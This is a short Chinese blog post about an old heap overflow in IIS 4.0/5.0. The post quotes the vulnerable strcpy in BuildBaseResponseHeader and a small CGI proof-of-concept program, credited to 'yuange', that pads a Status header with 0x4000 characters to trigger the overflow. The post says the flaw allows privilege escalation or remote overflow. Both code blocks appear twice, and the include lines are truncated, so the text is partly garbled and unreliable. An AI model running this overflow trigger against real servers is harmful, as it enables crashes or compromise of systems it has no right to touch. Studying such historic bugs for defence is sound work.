IIS处理HTML头缓冲区溢出漏洞,老漏洞了,可以提权或者远程溢出。就是处理返回状态的时候,没有检测缓冲区大小。
HTTP_REQ_BASE::BuildBaseResponseHeader(
BUFFER * Response,
...
STR * pstr,
...
)
{
......
if ( !pstr )
{
}
else
{
strcpy( (CHAR *) Response->Ptr(), pstr->Str() );
//缓冲溢出,堆溢出
......
}
/*
cgi.c ver1.0
iis4.0、iis5.0 overflow program
copy by yuange 2003.1.3
*/
#include
#include
#define BUFFSIZE 0x4000
int main(int argc, char **argv)
{
char buff[BUFFSIZE];
memset(buff,'a',BUFFSIZE);
memset(buff+BUFFSIZE-1,0,1);
printf("Status:200ok%s\r\n\r\n\r\n\n\n",buff);
return(0);
}
HTTP_REQ_BASE::BuildBaseResponseHeader(
BUFFER * Response,
...
STR * pstr,
...
)
{
......
if ( !pstr )
{
}
else
{
strcpy( (CHAR *) Response->Ptr(), pstr->Str() );
//缓冲溢出,堆溢出
......
}
/*
cgi.c ver1.0
iis4.0、iis5.0 overflow program
copy by yuange 2003.1.3
*/
#include
#include
#define BUFFSIZE 0x4000
int main(int argc, char **argv)
{
char buff[BUFFSIZE];
memset(buff,'a',BUFFSIZE);
memset(buff+BUFFSIZE-1,0,1);
printf("Status:200ok%s\r\n\r\n\r\n\n\n",buff);
return(0);
}
本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/385/
YesCK 
本文 暂无 评论